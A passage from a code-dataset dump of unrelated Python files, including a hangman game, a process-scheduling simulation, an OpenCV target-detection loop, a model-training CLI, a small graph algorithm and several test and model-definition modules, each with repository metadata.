config)\n","sub_path":"code/scripts/segmentation/baselines/isola.py","file_name":"isola.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570048377","text":"import random\nimport re\nimport hangmanpics\n\nwith open(\"words.txt\") as word_file:\n words_list = word_file.read().splitlines()\n\nHANGMANPICS = hangmanpics.hangmanpics_list\n\n\ndef blankout_letters(word):\n length = len(word)\n if length > 4:\n blank_positions = random.sample(range(1, length), int(2 * length / 3))\n else:\n blank_positions = random.sample(range(1, 5), 2)\n return blank_positions\n\n\ndef generate_word():\n chosen_word = words_list[random.randint(0, int(len(words_list) - 1))]\n blankList = blankout_letters(chosen_word)\n chosen_word_list = list(chosen_word)\n return chosen_word, [letter if count not in blankList else \"_\" for count, letter in enumerate(chosen_word_list)]\n\n\nchosen_word, final_word_list = generate_word()\ntotal_attempts = 4\nattempts = total_attempts\ngame_won = False\n\n\ndef guess_name():\n global attempts, final_word_list, game_won, HANGMANPICS\n print(final_word_list)\n user_input = input(f\"You have {attempts} attempts remaining \\n\")\n fill_positions = [i.start() for i in re.finditer(user_input, chosen_word)]\n if len(fill_positions) == 0:\n attempts -= 1\n print(\"WRONG guess\")\n print(HANGMANPICS[total_attempts - attempts - 1])\n else:\n final_word_list = [user_input if count in fill_positions else letter for count, letter in\n enumerate(final_word_list)]\n if \"_\" not in final_word_list:\n print(\"You guessed the work correctly!\")\n attempts = 0\n game_won = True\n return\n print(\"Correct guess\")\n\n\ndef reset_game():\n global attempts, game_won, final_word_list, chosen_word\n chosen_word, final_word_list = generate_word()\n game_won = False\n attempts = total_attempts\n\n\ndef play_game():\n print(f\"Guess the word in {attempts} attempts\")\n while attempts > 0:\n guess_name()\n if not game_won:\n print(\"Hangman - You lose\")\n print(f\"Word was - {chosen_word}\")\n play_again = input(\"Play again ? - Y/N \\n\")\n if play_again == \"Y\" or play_again == 'y':\n reset_game()\n play_game()\n\nif __name__ == \"__main__\":\n play_game()\n","sub_path":"hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548387788","text":"import process as pr\r\nimport random as rnd\r\n\r\n\r\nglobal PROCESS_APPEAR_PROBABILITY\r\nglobal PROCESS_LIST\r\nglobal FINISHED_PROCESS_LIST\r\nglobal CURRENT_ITERATION\r\nglobal CURRENT_PROCESS\r\nglobal FREE_PROCESSOR\r\nglobal TASK_NUMBER\r\nglobal FINISHED_TASK_NUMBER\r\nglobal CURRENT_TASK_NUMBER\r\n\r\n\r\n\r\n\r\ndef planning():\r\n\tglobal CURRENT_ITERATION\r\n\tglobal TASK_NUMBER\r\n\tglobal FINISHED_TASK_NUMBER\r\n\tglobal FREE_PROCESSOR\r\n\tglobal CURRENT_PROCESS\r\n\tglobal CURRENT_TASK_NUMBER\r\n\tglobal FINISHED_PROCESS_LIST\r\n\twhile True:\r\n\t\t\r\n\t\tif TASK_NUMBER == FINISHED_TASK_NUMBER:\r\n\t\t\tbreak \r\n\r\n\t\tprint(\"-------------------------------------------------------------------------------\")\r\n\t\tprint(\"Iteration \", CURRENT_ITERATION)\r\n\t\tprint()\r\n\r\n\t\tif CURRENT_TASK_NUMBER < TASK_NUMBER:\r\n\t\t\tif rnd.random() < PROCESS_APPEAR_PROBABILITY:\r\n\t\t\t\tCURRENT_TASK_NUMBER += 1\r\n\t\t\t\tPROCESS_LIST.append(pr.Process(rnd.randint(3, 10), CURRENT_ITERATION, CURRENT_TASK_NUMBER))\r\n\t\t\t\tprint(\"Task \", CURRENT_TASK_NUMBER, \" appeared\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Task didn't appear\")\r\n\t\telse:\r\n\t\t\tprint(\"All tasks have already appeared. There will not be other tasks\")\r\n\t\t\t\t\r\n\t\tif FREE_PROCESSOR and PROCESS_LIST == []:\r\n\t\t\tprint (\"Processor is free. There are no task to compute\")\r\n\r\n\t\tif (FREE_PROCESSOR and PROCESS_LIST):\r\n\t\t\tFREE_PROCESSOR = False\r\n\t\t\tCURRENT_PROCESS = PROCESS_LIST.pop(0)\r\n\t\t\tCURRENT_PROCESS.start_time = CURRENT_ITERATION\r\n\r\n\r\n\t\t\t\r\n\t\tif CURRENT_PROCESS != []:\r\n\t\t\tCURRENT_PROCESS.execute();\r\n\t\t\tprint(\"Task \", CURRENT_PROCESS.name, \" is computing. Time to finish \", CURRENT_PROCESS.time_to_finish)\r\n\t\t\tfor element in PROCESS_LIST:\r\n\t\t\t\telement.wait();\r\n\r\n\t\t\tif CURRENT_PROCESS.time_to_finish == 0:\r\n\t\t\t\tFREE_PROCESSOR = True\r\n\t\t\t\tFINISHED_TASK_NUMBER +=1\r\n\t\t\t\tCURRENT_PROCESS.finish_time = CURRENT_ITERATION\r\n\t\t\t\tFINISHED_PROCESS_LIST.append(CURRENT_PROCESS)\r\n\t\t\t\tCURRENT_PROCESS = []\r\n\r\n\t\t\t\r\n\r\n\t\tCURRENT_ITERATION += 1\r\n\r\n\t\tprint(\"-------------------------------------------------------------------------------\")\r\n\r\n\r\ndef print_table():\r\n\tprint(\"Number | appear time | execute time | start time | finish time | wait time | full time |\")\r\n\tmiddle_wait_time = 0\r\n\tmiddle_executive_time = 0\r\n\tfor element in FINISHED_PROCESS_LIST:\r\n\t\tmiddle_wait_time += element.wait_time\r\n\t\tmiddle_executive_time += element.wait_time + element.executive_time\r\n\t\tprint(\" %5d | %5d | %5d | %5d | %5d | %5d | %5d |\" % (element.name, element.appear_time, element.executive_time, element.start_time, element.finish_time, element.wait_time, element.wait_time+element.executive_time))\r\n\tmiddle_wait_time = middle_wait_time/len(FINISHED_PROCESS_LIST)\r\n\tmiddle_executive_time = middle_executive_time/len(FINISHED_PROCESS_LIST)\r\n\tprint(\"Middle wait time for processes = \", middle_wait_time)\r\n\tprint(\"Middle executive time with waiting for processes = \", middle_executive_time)\r\n\r\n\t\t\r\n\r\n\t\t\r\n\t\t\r\n\r\n\r\nif __name__ == '__main__':\r\n\tPROCESS_APPEAR_PROBABILITY = 0.3\r\n\tPROCESS_LIST = []\r\n\tCURRENT_ITERATION = 0\r\n\tFREE_PROCESSOR = True\r\n\tTASK_NUMBER = 10\r\n\tFINISHED_TASK_NUMBER = 0\r\n\tCURRENT_PROCESS = []\r\n\tCURRENT_TASK_NUMBER = 0\r\n\tFINISHED_PROCESS_LIST = []\r\n\tplanning();\r\n\tprint_table()\r\n","sub_path":"lab1/FCFS.py","file_name":"FCFS.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494271745","text":"import unittest\nimport os.path\nimport analytics.forecast.historical as hist\nfrom datetime import datetime\n\n\nclass HistoricalDataTest(unittest.TestCase):\n def test_something(self):\n hist.read_multifile()\n\n def test_filename_parse(self):\n # Arrange\n fullpath = os.path.join(hist.data_dir, \"gfs.0p25.2019011012.f153-2019011500.f057.grib2.panzer408979.nc.tar\")\n now = datetime(year=2019, month=1, day=11)\n fc_time = datetime(year=2019, month=1, day=16, hour=3)\n\n # Act\n tf = hist.NetCDFRangeTarfile(fullpath)\n contained = tf.contains(now, fc_time)\n\n # Assert\n self.assertTrue(contained)\n\n def test_get_dataset(self):\n now = datetime(year=2019, month=1, day=11)\n fc_time = datetime(year=2019, month=1, day=16, hour=3)\n hist.get_dataset(now, fc_time)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"gui_and_analytics/analytics/forecast/test/test_historical.py","file_name":"test_historical.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480972768","text":"import autolens as al\n\nimport numpy as np\n\nfrom autolens import exc\nfrom autolens.array import mapping\nfrom autolens.array.util import mask_util\n\n\nclass MockMask(al.Mask):\n def __new__(cls, array, pixel_scale=1.0, sub_size=1, *args, **kwargs):\n\n obj = np.array(array, dtype=\"bool\").view(cls)\n obj.pixel_scale = pixel_scale\n obj.sub_size = sub_size\n obj.sub_length = int(sub_size ** 2.0)\n obj.sub_fraction = 1.0 / obj.sub_length\n obj.origin = (0.0, 0.0)\n obj.mapping = mapping.Mapping(mask=obj)\n\n return obj\n\n def __init__(self, array, pixel_scale=1.0, sub_size=1):\n pass\n\n def blurring_mask_from_psf_shape(self, psf_shape):\n \"\"\"Compute a blurring mask, which represents all masked pixels whose light will be blurred into unmasked \\\n pixels via PSF convolution (see grid.Grid.blurring_grid_from_mask_and_psf_shape).\n\n Parameters\n ----------\n psf_shape : (int, int)\n The shape of the psf which defines the blurring region (e.al. the shape of the PSF)\n \"\"\"\n\n if psf_shape[0] % 2 == 0 or psf_shape[1] % 2 == 0:\n raise exc.MaskException(\"psf_size of exterior region must be odd\")\n\n blurring_mask = al.mask_util.blurring_mask_from_mask_and_psf_shape(\n self, psf_shape\n )\n\n return MockMask(array=blurring_mask, pixel_scale=self.pixel_scale)\n\n\nclass MockMask1D(np.ndarray):\n def __new__(cls, shape, pixel_scale=1.0, *args, **kwargs):\n\n array = np.full(fill_value=False, shape=shape)\n\n obj = np.array(array, dtype=\"bool\").view(cls)\n obj.pixel_scale = pixel_scale\n obj.origin = (0.0, 0.0)\n\n return obj\n","sub_path":"test/unit/mock/data/mock_mask.py","file_name":"mock_mask.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345699078","text":"import cv2\nimport numpy as np\nimport logging\nimport nt_client\nimport ocupus_cam\n\n#cap=cv2.VideoCapture\ncap=cv2.VideoCapture(2)\n\nclient = nt_client.NetworkTableClient(\"3574\")\nclient.setValue(\"/Vision/Test\", \"howdy\")\n\nvertTopLeftX = 0\nvertTopLeftY = 0\nhorizBottomRightX = 0\nhorizBottomRightY = 0\n\nwhile True:\n r,f=cap.read()\n f = cv2.resize(f,(320,240))\n gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)\n\n contourCount = 0\n\n verAndHorClose = False\n logging.warning(str(vertTopLeftX) + \",\" + str(vertTopLeftY) + \" (vertTopLeftX),(vertTopLeftY) Log\")\n logging.warning(str(horizBottomRightX) + \",\" + str(horizBottomRightY) + \" (horizBottomRightX),(horizBottomRightY) Log\")\n closeX = vertTopLeftX - horizBottomRightX\n closeY = horizBottomRightY - vertTopLeftY \n logging.warning(str(closeX) + \",\" + str(closeY) + \" (closeX),(closeY) Log\")\n if (closeX < 50 and closeY < 50 and closeX + closeY != 0) :\n verAndHorClose = True\n else :\n verAndHorClose = False\n \n (thresh, im_bw) = cv2.threshold(gray, 250, 255, cv2.THRESH_BINARY)\n (contours, hierarchy) = cv2.findContours(im_bw,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n #cv2.drawContours(f, contours, -1, (0,255,0),3)\n\n c = len(contours)\n #cv2.putText(f,c,(5,25), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0,255,0))\n \n for j in range(0, len(contours)) :\n cnt = contours[j]\n \n perimeter = cv2.arcLength(cnt,True)\n #logging.warning(str(perimeter) + \" perimeter Log\")\n\n approx = cv2.approxPolyDP(cnt,0.01*perimeter,True)\n #logging.warning(str(j) + \" x Log\")\n #logging.warning(str(len(cnt)) + \" Len cnt\")\n \n area = cv2.contourArea(cnt)\n #logging.warning(str(area) + \" area Log\")\n \n if (area < 400 or perimeter < 100) :\n continue\n if (perimeter > area) :\n continue\n if (area > 10000 or perimeter > 1000) :\n continue\n if (perimeter + area > 10000) :\n continue\n \n k = cv2.isContourConvex(cnt)\n logging.warning(str(k) + \" k Log\")\n\n x,y,w,h = cv2.boundingRect(cnt)\n \n areaApprox = cv2.contourArea(approx)\n #areaIm = cv2.contourArea(im)\n if (h > 200 or w > 200) :\n continue\n if (areaApprox * 2 < area) :\n continue\n if (w == h) :\n continue\n #if (k == True) :\n #continue\n\n rect = cv2.minAreaRect(cnt)\n box = cv2.cv.BoxPoints(rect)\n box = np.int0(box)\n im = cv2.drawContours(f,[box],0,(0,0,255),2)\n img = cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)\n\n logging.warning(str(w) + \" w Log\")\n logging.warning(str(h) + \" h Log\")\n logging.warning(str(w * h) + \" Blue area Log\")\n logging.warning(str((h * 2) + (w * 2)) + \" Blue perimeter Log\")\n\n if (w < h) : # vertical - yellow\n cv2.drawContours(f, [approx], -1, (0,255,255),3)\n contourCount += 1\n\n vertTopLeftX = x\n vertTopLeftY = y\n vertBottomRightX = x + w\n vertBottomRightY = y + h\n vertWidth = w\n vertHeight = h\n x1,y1,w1,h1 = x,y,w,h\n \n #if (0 < (w / h) < (32 / 32)) :\n contour1 = j\n vertical1 = True\n #client.setValue(\"/Vision/contour1\", contour1 * 1.0)\n \n logging.warning(str(x) + \", \" + str(y) + \" (x, y) Log\")\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 1 \" + str(contour1))\n logging.warning(\"contour 1 vertical \" + str(vertical1))\n \n elif (h < w) : # horizontal - cyan\n cv2.drawContours(f, [approx], -1, (255,255,0),3)\n contourCount += 1\n\n horizTopLeftX = x\n horizTopLeftY = y\n horizBottomRightX = x + w\n horizBottomRightY = y + h\n horizWidth = w\n horizHeight = h\n x2,y2,w2,h2 = x,y,w,h\n \n #if (0 < (w / h) < (32 / 32)) :\n contour2 = j\n horizantal2 = True\n \n logging.warning(str(x) + \", \" + str(y) + \" (x, y) Log\")\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 2 \" + str(contour2))\n logging.warning(\"contour 2 horizantal \" + str(horizantal2))\n \n else :\n cv2.drawContours(f, [approx], -1, (0,255,0),3)\n contour3 = j\n wrong3 = True\n\n logging.warning(str(j) + \" j Log\")\n logging.warning(str(k) + \" k Log\")\n logging.warning(str(len(cnt)) + \" Len cnt\")\n logging.warning(str(perimeter) + \" perimeter Log\")\n logging.warning(str(area) + \" area Log\")\n logging.warning(\"contour 3 \" + str(contour3))\n logging.warning(\"contour 3 wrong \" + str(wrong3))\n\n logging.warning(str(c) + \" c Log\")\n logging.warning(str(im) + \" im Log\")\n logging.warning(str(img) + \" img Log\")\n\n M = cv2.moments(cnt)\n if (M['m00'] != 0) :\n centroid_x = int(M['m10']/M['m00'])\n centroid_y = int(M['m01']/M['m00'])\n cv2.circle(f, (centroid_x, centroid_y), 1, (77, 177, 77), 5)\n cv2.circle(f, (x, y), 1, (177, 77, 177), 5)\n #cv2.circle(f, center, radius, color[, thickness[, lineType[, shift]]]) \n\n #rect = cv2.minAreaRect(cnt)\n #box = cv2.cv.boxPoints(rect)\n #box2 = np.int0(box)\n #im = cv2.drawContours(f,[box2],0,(0,0,255),2)\n logging.warning(str(contourCount) + \" contourCount Log\")\n if (contourCount == 2) :\n logging.warning(str(x1) + \", \" + str(y1) + \" (x1, y1) Log\")\n logging.warning(str(x2) + \", \" + str(y2) + \" (x2, y2) Log\")\n x2BottomRight = x2 + w2\n y2BottomRight = y2 + h2\n cv2.line(f, (x1, y1), (x2 + w2, y2 + h2), (107,7,255))\n logging.warning(str(x1 - x2) + \",\" + str(y1 - y2) + \" (x1 - x2),(y1 - y2) Log\")\n cv2.rectangle(f,(x1, y1),(x2 + w2, y2 + h2),(255,7,107),2)\n logging.warning(\"x,y:x,y \"\n + str(vertTopLeftX) + \",\"\n + str(vertTopLeftY) + \":\"\n + str(horizBottomRightX) + \",\"\n + str(horizBottomRightY))\n cv2.circle(f, (vertTopLeftX, vertTopLeftY), 1, (0, 127, 0), 5)\n cv2.circle(f, (horizBottomRightX, horizBottomRightY), 1, (0, 255, 0), 5)\n elif (contourCount != 2) :\n horizTopLeftX = 0\n horizTopLeftY = 0\n horizBottomRightX = 0\n horizBottomRightY = 0\n horizWidth = 0\n horizHeight = 0\n\n # send the contour count to the network tables\n client.setValue(\"/Vision/Vertical_And_Horizontal_Close\", verAndHorClose)\n logging.warning(str(verAndHorClose) + \" Vertical_And_Horizontal_Close\")\n \n cv2.imshow(\"gray\",gray)\n cv2.imshow(\"im_bw\",im_bw)\n cv2.imshow(\"f\",f)\n cv2.waitKey(1)\n \n #logging.warning('You smell haha get on my level')\n","sub_path":"getting2rectanglesandcomparing - High Resolution.py","file_name":"getting2rectanglesandcomparing - High Resolution.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172361172","text":"import argparse\n\n# Custom generator for our dataset\nfrom modules.python.models.train import train\nfrom modules.python.Options import TrainOptions\nfrom modules.python.FileManager import FileManager\n\"\"\"\nThe train module of HELEN trains a deep neural network to perform a multi-task classification. It takes a set of\nlabeled images from MarginPolish and trains the model to predict a base and the run-length of the base using a \ngated recurrent unit (GRU) based model. This script is the interface to the training module. \n\"\"\"\n\n\nclass TrainModule:\n \"\"\"\n Train module that provides an interface to the train method of HELEN.\n \"\"\"\n def __init__(self, train_file, test_file, gpu_mode, max_epochs, batch_size, num_workers,\n retrain_model, retrain_model_path, model_dir, stats_dir):\n self.train_file = train_file\n self.test_file = test_file\n self.gpu_mode = gpu_mode\n self.log_directory = log_dir\n self.model_dir = model_dir\n self.epochs = max_epochs\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.retrain_model = retrain_model\n self.retrain_model_path = retrain_model_path\n self.stats_dir = stats_dir\n self.hidden_size = TrainOptions.HIDDEN_SIZE\n self.gru_layers = TrainOptions.GRU_LAYERS\n self.learning_rate = 0.0001\n self.weight_decay = 0\n\n def train_model(self):\n # train a model\n model, optimizer, stats_dictionary = train(self.train_file,\n self.test_file,\n self.batch_size,\n self.epochs,\n self.gpu_mode,\n self.num_workers,\n self.retrain_model,\n self.retrain_model_path,\n self.gru_layers,\n self.hidden_size,\n self.learning_rate,\n self.weight_decay,\n self.model_dir,\n self.stats_dir,\n not_hyperband=True)\n\n return model, optimizer, stats_dictionary\n\n\nif __name__ == '__main__':\n '''\n Processes arguments and performs tasks.\n '''\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--train_file\",\n type=str,\n required=True,\n help=\"Training data description csv file.\"\n )\n parser.add_argument(\n \"--test_file\",\n type=str,\n required=True,\n help=\"Training data description csv file.\"\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n required=False,\n default=100,\n help=\"Batch size for training, default is 100.\"\n )\n parser.add_argument(\n \"--epoch_size\",\n type=int,\n required=False,\n default=10,\n help=\"Epoch size for training iteration.\"\n )\n parser.add_argument(\n \"--model_out\",\n type=str,\n required=False,\n default='./model',\n help=\"Path and file_name to save model, default is ./model\"\n )\n parser.add_argument(\n \"--retrain_model\",\n type=bool,\n default=False,\n help=\"If true then retrain a pre-trained mode.\"\n )\n parser.add_argument(\n \"--retrain_model_path\",\n type=str,\n default=False,\n help=\"Path to the model that will be retrained.\"\n )\n parser.add_argument(\n \"--gpu_mode\",\n type=bool,\n default=False,\n help=\"If true then cuda is on.\"\n )\n parser.add_argument(\n \"--num_workers\",\n type=int,\n required=False,\n default=16,\n help=\"Number of workers to assign to the dataloader.\"\n )\n FLAGS, unparsed = parser.parse_known_args()\n model_out_dir, log_dir = FileManager.handle_train_output_directory(FLAGS.model_out)\n tm = TrainModule(FLAGS.train_file, FLAGS.test_file, FLAGS.gpu_mode, FLAGS.epoch_size, FLAGS.batch_size,\n FLAGS.num_workers, FLAGS.retrain_model, FLAGS.retrain_model_path, model_out_dir, log_dir)\n tm.train_model()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161665116","text":"from Bio import SeqIO\nfrom random import randint\nfrom os.path import splitext\n\nBASES = [\"A\",\"C\",\"G\",\"T\"]\n\ndef replace_ns(fasta):\n prefix, ext = splitext(fasta)\n fa = [f for f in SeqIO.parse(open(fasta), 'fasta')][0]\n title = fa.id\n seq = str(fa.seq)\n new_seq = \"\"\n for base in seq:\n if base == \"N\":\n base = BASES[randint(0,3)]\n new_seq += base\n\n with open(prefix + \".NoN\" + ext, \"w\") as f:\n f.write(\">\"+title+\"\\n\")\n f.write(new_seq+ \"\\n\")\n\nreplace_ns(\"Mus_musculus.GRCm38.dna.chromosome.2.fa\")","sub_path":"replace_ns.py","file_name":"replace_ns.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458981433","text":"from django.test import TestCase\nfrom routeCalc.helpers.pathfinder import Pathfinder\n\n\nclass TestPathfinder(TestCase):\n example = {\n \"A\": [\"B\", \"C\"],\n \"B\": [\"D\", \"E\"],\n \"C\": [\"D\"],\n \"D\": [\"E\"]\n }\n\n example_2 = {\n \"A\": [\"B\", \"C\", \"D\", \"E\", \"F\"],\n \"B\": [\"C\", \"G\"],\n \"C\": [\"B\"],\n \"D\": [\"G\", \"F\"],\n \"E\": [],\n \"F\": [\"H\", \"Q\"],\n \"G\": [\"H\", \"N\"],\n \"H\": [\"O\"],\n \"O\": [\"P\"],\n \"N\": [],\n \"P\": [],\n \"Q\": []\n }\n\n def test_pathfinder(self):\n pathfinder = Pathfinder(self.example)\n\n try:\n self.assertIsNotNone(pathfinder.find(\"A\", \"B\"))\n except Exception as e:\n self.fail(str(e))\n\n def test_pathfinder_2(self):\n pathfinder = Pathfinder(self.example)\n\n try:\n self.assertIsNotNone(pathfinder.find(\"A\", \"Q\"))\n except Exception as e:\n self.fail(str(e))\n","sub_path":"tests/TestPathfinder.py","file_name":"TestPathfinder.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23219226","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nfrom .air_submode_enumeration import AirSubmodeEnumeration\nfrom .bus_submode_enumeration import BusSubmodeEnumeration\nfrom .coach_submode_enumeration import CoachSubmodeEnumeration\nfrom .funicular_submode_enumeration import FunicularSubmodeEnumeration\nfrom .metro_submode_enumeration import MetroSubmodeEnumeration\nfrom .rail_submode_enumeration import RailSubmodeEnumeration\nfrom .snow_and_ice_submode_enumeration import SnowAndIceSubmodeEnumeration\nfrom .telecabin_submode_enumeration import TelecabinSubmodeEnumeration\nfrom .tram_submode_enumeration import TramSubmodeEnumeration\nfrom .water_submode_enumeration import WaterSubmodeEnumeration\n\n__NAMESPACE__ = \"http://www.netex.org.uk/netex\"\n\n\n@dataclass\nclass TransportSubmodeStructure:\n choice: Optional[object] = field(\n default=None,\n metadata={\n \"type\": \"Elements\",\n \"choices\": (\n {\n \"name\": \"AirSubmode\",\n \"type\": AirSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"BusSubmode\",\n \"type\": BusSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"CoachSubmode\",\n \"type\": CoachSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"FunicularSubmode\",\n \"type\": FunicularSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"MetroSubmode\",\n \"type\": MetroSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"TramSubmode\",\n \"type\": TramSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"TelecabinSubmode\",\n \"type\": TelecabinSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"RailSubmode\",\n \"type\": RailSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"WaterSubmode\",\n \"type\": WaterSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"SnowAndIceSubmode\",\n \"type\": SnowAndIceSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n ),\n }\n )\n","sub_path":"netex/models/transport_submode_structure.py","file_name":"transport_submode_structure.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42344058","text":"\"\"\"\nViews for the Mover objects.\nThis currently includes ??? objects.\n\"\"\"\nfrom .common_object import get_object, create_or_update_object\n\nfrom cornice import Service\n\nenv = Service(name='mover', path='/mover*obj_id',\n description=\"Mover API\")\n\nimplemented_types = ('gnome.movers.simple_mover.SimpleMover',\n 'gnome.movers.wind_movers.WindMover',\n 'gnome.movers.wind_movers.GridWindMover',\n 'gnome.movers.random_movers.RandomMover',\n 'gnome.movers.random_movers.RandomVerticalMover',\n 'gnome.movers.current_movers.CatsMover',\n 'gnome.movers.current_movers.ComponentMover',\n 'gnome.movers.current_movers.GridCurrentMover',\n 'gnome.movers.vertical_movers.RiseVelocityMover',\n )\n\n\n@env.get()\ndef get_mover(request):\n '''Returns an Gnome Environment object in JSON.'''\n return get_object(request, implemented_types)\n\n\n@env.put()\ndef create_or_update_mover(request):\n '''Creates or Updates an Environment object.'''\n return create_or_update_object(request, implemented_types)\n","sub_path":"web/gnome/webgnome_data/webgnome_data/views/mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"481600964","text":"import sys; readline = sys.stdin.readline\nN, M = map(int,readline().split())\nadj = [[0]*(N+1) for _ in range(N+1)]\nfor _ in range(M):\n i, j = map(int,readline().split())\n adj[i][j] = 1\n adj[j][i] = 1\n\nfor k in range(1,N+1):\n for x in range(1,N+1):\n for y in range(1,N+1):\n if x == k or y == k or x == y:\n continue\n if adj[x][k] and adj[k][y]:\n if adj[x][y]:\n adj[x][y] = min(adj[x][y], adj[x][k]+adj[k][y])\n else:\n adj[x][y] = adj[x][k]+adj[k][y]\n\nanw_list = []\nmin_v = 1000000\nmin_idx = 0\nfor idx in range(N,0,-1):\n v = adj[idx]\n tmp = sum(v)\n if tmp <= min_v:\n min_v = tmp\n min_idx = idx\n\n#print(adj)\nprint(min_idx)","sub_path":"BOJ/graph/1389.py","file_name":"1389.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"589176040","text":"\"\"\"\nVisualize data.\n\"\"\"\nimport os\nfrom glob import glob\nimport argparse\nimport numpy as np\nimport cv2\n\n\ndef draw_points(img, points, color=(255, 0, 0)):\n \"\"\"\n\n Args:\n img (np.ndarray): Array of an image.\n points (list or PointList): An instance contains key-points.\n color (tuple): BGR color.\n\n \"\"\"\n\n for p in points:\n x, y = p\n cv2.circle(img, (x, y), 2, color, 2)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('img_dir', type=str,\n help='Path to the directory of inpout images.')\n parser.add_argument('keypoints_dir', type=str,\n help='Path to the directory of input keypoints files.')\n args = parser.parse_args()\n\n img_paths = sorted(glob(os.path.join(args.img_dir, '*')))\n keypoints_paths = sorted(glob(os.path.join(args.keypoints_dir, '*')))\n for img_path, keypoints_path in zip(img_paths, keypoints_paths):\n img = cv2.imread(img_path)\n data = np.loadtxt(keypoints_path, delimiter=',').astype(np.int)\n keypoints = (data[:, :2]).tolist()\n print('============================')\n print(os.path.basename(img_path))\n print(os.path.basename(keypoints_path))\n draw_points(img, keypoints)\n cv2.imshow('img', img)\n key = cv2.waitKey(0) & 0xff\n if key == ord('q'):\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"support_tools/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"33488623","text":"#!/usr/bin/env python\n\nimport os\nimport os.path\nimport logging\nimport random\nimport string\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nfrom tornado.escape import json_decode, native_str\n\nfrom postgres import Postgres\nfrom postgres.orm import Model\nfrom route import route\n\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\ndefine('debug', default=True, help=\"run in debug mode\", type=bool)\n\n\nclass Application(tornado.web.Application):\n\n def __init__(self, debug):\n base_dir = os.path.dirname(__file__)\n\n handlers = [\n ] + route.routes()\n\n settings = {\n \"title\": \"Simple File Browser\",\n \"static_path\": os.path.join(base_dir, \"static\"),\n \"debug\": debug\n }\n\n super(Application, self).__init__(handlers, **settings)\n # Have one global connection to the DB across all handlers\n self.db = self.initdb(self.env)\n\n def initdb(self, env):\n db_dsn = env.get('db_dsn')\n maxconn = env.get('db_maxconn')\n db = Postgres(db_dsn, maxconn=maxconn)\n db.register_model(Node)\n\n return db\n\n @property\n def env(self):\n return dict(\n db_dsn=os.environ.get('DB_DSN'),\n db_maxconn=os.environ.get('DB_MAXCONN')\n )\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"simple output for xapplication-json only.\n \"\"\"\n\n @property\n def db(self):\n return self.application.db\n\n def prepare(self):\n # Incorporate request JSON into arguments dictionary.\n 